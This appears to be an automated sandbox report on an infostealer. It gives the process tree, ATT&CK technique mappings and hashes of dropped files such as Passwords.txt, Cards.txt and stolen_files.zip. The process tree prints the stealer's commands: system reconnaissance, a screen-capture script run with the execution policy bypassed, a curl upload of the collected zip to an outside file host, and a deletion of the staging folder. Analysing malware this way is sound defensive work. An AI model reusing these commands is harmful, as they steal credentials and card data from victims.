        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:3124
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        
        PID:1076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:4596
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:4872
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:3088
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:1192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      4⤵
      PID:3712
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2980
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      4⤵
      PID:2228
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3776
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:3316
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        Blocklisted process makes network request
        
        PID:4708
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:4480
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:3268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:3320
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:2028
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:2616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      4⤵
      PID:1580
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      4⤵
      PID:2116
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:700
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        
        PID:3100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
      4⤵
      PID:4852
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Dwcxzjlh.zip";"
      4⤵
      PID:1160
    - - C:\Windows\system32\curl.exe
        
        curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Dwcxzjlh.zip";
        5⤵
        
        PID:4840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:4400
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:3232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:3872
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:2804
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:4128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      4⤵
      PID:4556
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:4720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      4⤵
      PID:5040
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:4596
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        
        PID:3632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:1896
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:2688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:4892
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:1800
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:4920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      4⤵
      PID:1716
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      4⤵
      PID:1696
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:892
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        
        PID:1992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:4708
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:2972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:2720
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:4868
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:2456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      4⤵
      PID:1080
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:4692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      4⤵
      PID:4800
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4592
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:3684
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        
        PID:4120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:3464
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:4140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:3620
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:256
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:4360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      4⤵
      PID:3980
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      4⤵
      PID:4012
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:2372
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        
        PID:2164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
      4⤵
      PID:3500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:2144
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:3636
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:3364
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:3424
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:4344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      4⤵
      PID:928
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      4⤵
      PID:3428
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2352
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:3028
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        
        PID:2996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:3924
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:2612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:4936
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:2716
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:1000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      4⤵
      PID:1476
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      4⤵
      PID:3908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2480
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:1144
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        
        PID:1072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:1056
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:2616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:564
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:2760
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:1692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      4⤵
      PID:4332
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:4652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      4⤵
      PID:3144
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:4248
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        
        PID:852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:5032
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:2820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:3080
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:700
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:4588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      4⤵
      PID:636
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      4⤵
      PID:3232
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:3716
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        
        PID:2148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:3500
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:2592
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:2144
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:3552
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:2884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Steam\Launcher\EN-DWC~1\debug.log

Filesize
1KB

MD5
237993d1e94e5a67789573662d90c8ca

SHA1
7385b4fbe6437f04473ae3ff84f1ff44923552bf

SHA256
6f57756f07af3abb359da7cc48f6121f61e1d45dc1bae6eb65af79d2222af60b

SHA512
eadfa580e83f5f35861e28510cf49418cc12a66b98f5f8c30c9e4955ead80f74ccf11baff34f757656092872f0a0b75168f57fffea1415e80f077edb23b8cccc

Download Submit
C:\ProgramData\Steam\Launcher\EN-Dwcxzjlh.zip

Filesize
2KB

MD5
ed0d1ad9c4623eac2e3826bcffa800cd

SHA1
fcc6750a878bb135af73fa4cbd9a9c29f5488f7d

SHA256
00a4f126ca5e447388a5d40edb5f403de8a1642c100fcd23ed1628c404c95aef

SHA512
ad0cd466f847684711e9539083ef7cb3b5bbbcba7292f9e80e46d68361838b18482af5709082ef1ca1526b2a87505927add914e18b83c7e16642ade3e1610d37

Download Submit
C:\ProgramData\Steam\Launcher\EN-Dwcxzjlh\Autofills\Autofills.txt

Filesize
94B

MD5
2f308e49fe62fbc51aa7a9b987a630fe

SHA1
1b9277da78babd9c5e248b66ba6ab16c77b97d0b

SHA256
d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521

SHA512
c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

Download Submit
C:\ProgramData\Steam\Launcher\EN-Dwcxzjlh\Cards\Cards.txt

Filesize
70B

MD5
8a0ed121ee275936bf62b33f840db290

SHA1
898770c85b05670ab1450a96ea6fbd46e6310ef6

SHA256
983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709

SHA512
7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

Download Submit
C:\ProgramData\Steam\Launcher\EN-Dwcxzjlh\Discord\discord.txt

Filesize
15B

MD5
675951f6d9d75fd2c9c06b5ff547c6fd

SHA1
9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

SHA256
60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

SHA512
44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

Download Submit
C:\ProgramData\Steam\Launcher\EN-Dwcxzjlh\Passwords\Passwords.txt

Filesize
78B

MD5
c5e74f3120dbbd446a527e785dfe6d66

SHA1
11997c2a53d19fd20916e49411c7a61bfb590e9c

SHA256
e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05

SHA512
a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

Download Submit
C:\ProgramData\Steam\Launcher\EN-Dwcxzjlh\Screenshots\Screenshot.png

Filesize
410KB

MD5
9485af420a0ea98c00467cdb8661bd82

SHA1
ccf1ab47a9a95dd1baab42159db107067c9ed289

SHA256
dfd6d6ad20165473f54810968b9014ff4d6a2feacc9a7aff823063875cb323b5

SHA512
fb38551e79a5ec418239ebf85c1897ce65350e294aa856a3755aff0def75cd2a8e139e7c7aed430b41fd2c55c55848c3402eecd88466aeb5590209c465fa35dd

Download Submit
C:\ProgramData\Steam\Launcher\EN-Dwcxzjlh\Serial-Check.txt

Filesize
506B

MD5
c8a6c22921e0e1e18fe4489d89661246

SHA1
9d39e5b47bee9dc2e01e6aff387829a82cb963d6

SHA256
c190a614645296da3588e79ccd3f4eadce23dfde3ef16e974b76699d205030b3

SHA512
eeecbac2172599abf7317a3b231ee135b9868d4611b3535e91fbfc747d9973c057327d1c90dc546e270c0ed57748863885b0f9727042ada7d4134c899d9983b6

Download Submit
C:\ProgramData\Steam\Launcher\EN-Dwcxzjlh\debug.log

Filesize
1KB

MD5
390fad44fadee42871428eed13c05559

SHA1
df2131a2f50b2ffb160106401b9931fbbc1cc6fe

SHA256
970a69a06104edc43e6ac0a05049aad30fb3db0b2f3873e36b56c0aba00e863e

SHA512
4a1e3937706e9b7dfff0d6a207af16186766be20af50e24a9096c9ff623a76d69a9f2a4fc07c1f4b9ebf21bd7cb4bcab8cdf619188667e9de5e3208a29a278e4

Download Submit
C:\ProgramData\Steam\Launcher\EN-Dwcxzjlh\debug.log

Filesize
1KB

MD5
35c8e38744a9a9baf15afd31d6ee14f3

SHA1
973f2c5f1aa85a6ecf9a89a4e851d081a741c0b1

SHA256
c880420ff2a9b5c9f0b6a56d3d51f43fc97e223111a8df6e7436f44f731033c2

SHA512
f7fc70b0cc8962d1d7a275415c45560a228d2349b8b29c75aa9d279c91ed0cc85a715eb2dfaeae623b60436be31dccc7ffb31fbf3a5e7c0159d0002248a8aae7

Download Submit
C:\ProgramData\Steam\Launcher\EN-Dwcxzjlh\stolen_files.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
05ec53e2d2d9867bc93e34e694faec45

SHA1
221d09c47199869538f2b541afa736c03c8d9579

SHA256
ec3ea75321fd8f902276f09b944f01186137b1df0032cd0b19f1cb4772f3c55f

SHA512
a31b105c05b4414c299cfd937757514e293da2772b905a185da21817edf29e6e22c25ad196976a774ba8352550f8d4c1735dbf9a10074e384abfb912e54aa011

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12ff85d31d9e76455b77e6658cb06bf0

SHA1
45788e71d4a7fe9fd70b2c0e9494174b01f385eb

SHA256
1c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056

SHA512
fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c05f86e2af03f35154ab4fbac5589d56

SHA1
d68bba0f958bc028dcd64481df14642da1c2c0f7

SHA256
5cc5463bbbd68566d06645fcebe4917de731a9893a0dd24cbb25c89f36b7d9e2

SHA512
58d0748b0919734598da8247809a9516308ad69b2dfd6640d3603ea82d1a15fb9bf9e432d0ae424e991dc1bfb27fdbab463ace53df16ad4cd97321e3564836ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
94be0a043a5ae3c6bc9ef9c0b19e6459

SHA1
36b3e8ea176997903a124e01f40821d37695c59b

SHA256
a2830c67f7f58f5ea5f529bbe9eab8981b60914235aa731c8fe6cc7f721fdeb2

SHA512
f44a88444ecfeb81bee8f62936aaf1ab7bf46b231b284435abe5f31ce3c6faf4122014c165f88624fd065f64b2582dd480a0f362d019e3313abbd3f746fc68e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
268f8186292cee533b8442c62103d97c

SHA1
445359b4a6893260c29921cb380ddb76fcb2f380

SHA256
7b9c99ce24216f329adb02688c799b22388e524446100b880c14a3f770a0d067

SHA512
ec141b8bedaba7519164cf750fbbda1fbcf857f63dced4ed32fdbe7885312d7471c0e03e2d330b572d930b1aae66d30283efa76d2dca43310a6fbb858fb0f793

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
de72a228bcabf1530b028259a45904a8

SHA1
8f584cd6b0e728a72e8fea86aeed8c308a80c95e

SHA256
3aa6fc7f1a9f4947c43dd2a3533a4db67bc89774b9eaa4f31279a1ff223b4411

SHA512
